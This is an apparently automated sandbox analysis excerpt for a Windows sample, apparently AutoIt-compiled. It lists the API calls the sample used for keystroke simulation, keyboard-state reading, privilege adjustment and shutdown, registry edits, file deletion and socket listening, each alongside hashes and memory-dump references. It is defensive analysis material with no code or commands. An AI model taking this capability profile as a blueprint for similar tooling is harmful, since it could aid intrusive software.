                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F$pbL
                    • API String ID: 3977979337-2097280626
                    • Opcode ID: 230c309e01b64dd526e4eceab0149aa8d8b99525a36798e8d5036c65b1638749
                    • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                    • Opcode Fuzzy Hash: 230c309e01b64dd526e4eceab0149aa8d8b99525a36798e8d5036c65b1638749
                    • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                    • API String ID: 1357608183-1426331590
                    • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                    • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                    • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                    • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                    APIs
                    • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                    • IsIconic.USER32(?), ref: 0043D66E
                    • ShowWindow.USER32(?,00000009), ref: 0043D67B
                    • SetForegroundWindow.USER32(?), ref: 0043D685
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                    • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                    • SetForegroundWindow.USER32(?), ref: 0043D6D2
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                    • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                    • keybd_event.USER32(00000012,00000000), ref: 0043D701
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                    • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                    • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                    • SetForegroundWindow.USER32(?), ref: 0043D721
                    • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                    • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                    • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                    • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                    APIs
                      • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                      • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                      • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                    • _memset.LIBCMT ref: 00458353
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                    • CloseHandle.KERNEL32(?), ref: 004583B6
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                    • GetProcessWindowStation.USER32 ref: 004583E6
                    • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                      • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                      • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $default$winsta0
                    • API String ID: 2063423040-1027155976
                    • Opcode ID: 6388ce5f88c963af8a849a756f99d6c3c13203fa5580aefd9d0f359e2798b7ca
                    • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                    • Opcode Fuzzy Hash: 6388ce5f88c963af8a849a756f99d6c3c13203fa5580aefd9d0f359e2798b7ca
                    • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                    • FindClose.KERNEL32(00000000), ref: 0046C7E1
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                    • __swprintf.LIBCMT ref: 0046C890
                    • __swprintf.LIBCMT ref: 0046C8D3
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                    • __swprintf.LIBCMT ref: 0046C927
                      • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                    • __swprintf.LIBCMT ref: 0046C975
                      • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                      • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                    • __swprintf.LIBCMT ref: 0046C9C4
                    • __swprintf.LIBCMT ref: 0046CA13
                    • __swprintf.LIBCMT ref: 0046CA62
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 3953360268-2428617273
                    • Opcode ID: 511509d096d8a85c851f2d3f16a46ec9b1aa2dd11cc0fa5b5634bac435d16de7
                    • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                    • Opcode Fuzzy Hash: 511509d096d8a85c851f2d3f16a46ec9b1aa2dd11cc0fa5b5634bac435d16de7
                    • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0046EFB6
                    • _wcscmp.LIBCMT ref: 0046EFCB
                    • _wcscmp.LIBCMT ref: 0046EFE2
                    • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                    • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                    • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                    • FindClose.KERNEL32(00000000), ref: 0046F031
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                    • _wcscmp.LIBCMT ref: 0046F074
                    • _wcscmp.LIBCMT ref: 0046F08B
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                    • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                    • FindClose.KERNEL32(00000000), ref: 0046F0D2
                    • FindClose.KERNEL32(00000000), ref: 0046F0E4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                    • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                    • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                    • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                    • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                    • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                    Strings
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    • Opcode ID: 3505478b3485744cc1070ec7f7eb5efd5be3945e855373bd555d4648a7c47e02
                    • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                    • Opcode Fuzzy Hash: 3505478b3485744cc1070ec7f7eb5efd5be3945e855373bd555d4648a7c47e02
                    • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                    Strings
                    Similarity
                    • API ID:
                    • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                    • API String ID: 0-559809668
                    • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                    • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                    • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                    • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0046F113
                    • _wcscmp.LIBCMT ref: 0046F128
                    • _wcscmp.LIBCMT ref: 0046F13F
                      • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                    • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                    • FindClose.KERNEL32(00000000), ref: 0046F179
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                    • _wcscmp.LIBCMT ref: 0046F1BC
                    • _wcscmp.LIBCMT ref: 0046F1D3
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                    • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                    • FindClose.KERNEL32(00000000), ref: 0046F21A
                    • FindClose.KERNEL32(00000000), ref: 0046F22C
                    Strings
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                    • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                    • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                    • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                    • __swprintf.LIBCMT ref: 0046A231
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                    • _memset.LIBCMT ref: 0046A2B2
                    • _wcsncpy.LIBCMT ref: 0046A2EE
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                    • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                    • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                    • CloseHandle.KERNEL32(00000000), ref: 0046A341
                    Strings
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                    • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                    • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                    • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00460097
                    • SetKeyboardState.USER32(?), ref: 00460102
                    • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                    • GetKeyState.USER32(000000A0), ref: 00460139
                    • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                    • GetKeyState.USER32(000000A1), ref: 00460179
                    • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                    • GetKeyState.USER32(00000011), ref: 004601B3
                    • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                    • GetKeyState.USER32(00000012), ref: 004601EA
                    • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                    • GetKeyState.USER32(0000005B), ref: 00460221
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                    • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                    • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                    • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
                    APIs
                      • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                    • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    • Opcode ID: 8542518c0941377969b425a9142a02189ed0d51512cf45e3ee4068e3fae0101d
                    • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                    • Opcode Fuzzy Hash: 8542518c0941377969b425a9142a02189ed0d51512cf45e3ee4068e3fae0101d
                    • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                    APIs
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    • Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                    • Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
                    • Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                    • Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
                    APIs
                      • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                      • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                    • FindFirstFileW.KERNEL32(?,?), ref: 004638A3
                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0046394B
                    • MoveFileW.KERNEL32(?,?), ref: 0046395E
                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0046397B
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046399D
                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 004639B9
                    Strings
                    Similarity
                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                    • String ID: \*.*
                    • API String ID: 4002782344-1173974218
                    • Opcode ID: 32dd859ec51da58861d6f9dcb4db6752a71db99bf47132f60a046952e6cdf141
                    • Instruction ID: 5f3270bf9419f81a9c4f0e0ab399985bb250d256c3569b2459e2ec67edc6ab47
                    • Opcode Fuzzy Hash: 32dd859ec51da58861d6f9dcb4db6752a71db99bf47132f60a046952e6cdf141
                    • Instruction Fuzzy Hash: 5551717180514CAACF05EFA1C9929EEB778AF14319F60047EE40277191EB396F0DCB5A
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                    • Sleep.KERNEL32(0000000A), ref: 0046F470
                    • _wcscmp.LIBCMT ref: 0046F484
                    • _wcscmp.LIBCMT ref: 0046F49F
                    • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
                    • FindClose.KERNEL32(00000000), ref: 0046F553
                    Strings
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                    • String ID: *.*
                    • API String ID: 713712311-438819550
                    • Opcode ID: 0fb37ddf953590d706fb9364c28091077e68f31a8b68d00aa4a0a6f7ff02baf6
                    • Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
                    • Opcode Fuzzy Hash: 0fb37ddf953590d706fb9364c28091077e68f31a8b68d00aa4a0a6f7ff02baf6
                    • Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
                    Strings
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID: 3cA$_A
                    • API String ID: 674341424-3480954128
                    • Opcode ID: b5ff72b53ff71591d332a2aabe0d5dc7d216b3689416c219ba8f5f8adc89534e
                    • Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
                    • Opcode Fuzzy Hash: b5ff72b53ff71591d332a2aabe0d5dc7d216b3689416c219ba8f5f8adc89534e
                    • Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
                    APIs
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: d7d38795a2a293d5cf14b61abe6428a9d3663c4a5cb54905e264e5f2bc5239c3
                    • Instruction ID: fe3fa380dd79410c0d4e58696af30f423fcd40af0ea7aa6f8d28fb308e13f721
                    • Opcode Fuzzy Hash: d7d38795a2a293d5cf14b61abe6428a9d3663c4a5cb54905e264e5f2bc5239c3
                    • Instruction Fuzzy Hash: 9D12AC70A00609DFCF04DFA5D981AEEB3F5FF88304F10452AE846A7291EB39AD55CB59
                    APIs
                      • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                      • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                      • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                    • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                    Strings
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    • API String ID: 2234035333-194228
                    • Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                    • Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
                    • Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                    • Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
                    APIs
                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
                    • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                    • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                    • listen.WSOCK32(00000000,00000005), ref: 00476316
                    • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                    • closesocket.WSOCK32(00000000,00000000), ref: 00476344
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    • API String ID: 1279440585-0
                    • Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                    • Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
                    • Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                    • Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
                    APIs
                      • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                      • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                    • _memmove.LIBCMT ref: 00450258
                    • _memmove.LIBCMT ref: 0045036D
                    • _memmove.LIBCMT ref: 00450414
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                    • String ID:
                    • API String ID: 1300846289-0
                    • Opcode ID: abb8a364f6375cf7ed3c27617171bcc33c0b941e786a2993e93d25adad6f172b
                    • Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
                    • Opcode Fuzzy Hash: abb8a364f6375cf7ed3c27617171bcc33c0b941e786a2993e93d25adad6f172b
                    • Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                    • GetSysColor.USER32(0000000F), ref: 00401A4E
                    • SetBkColor.GDI32(?,00000000), ref: 00401A61
                      • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
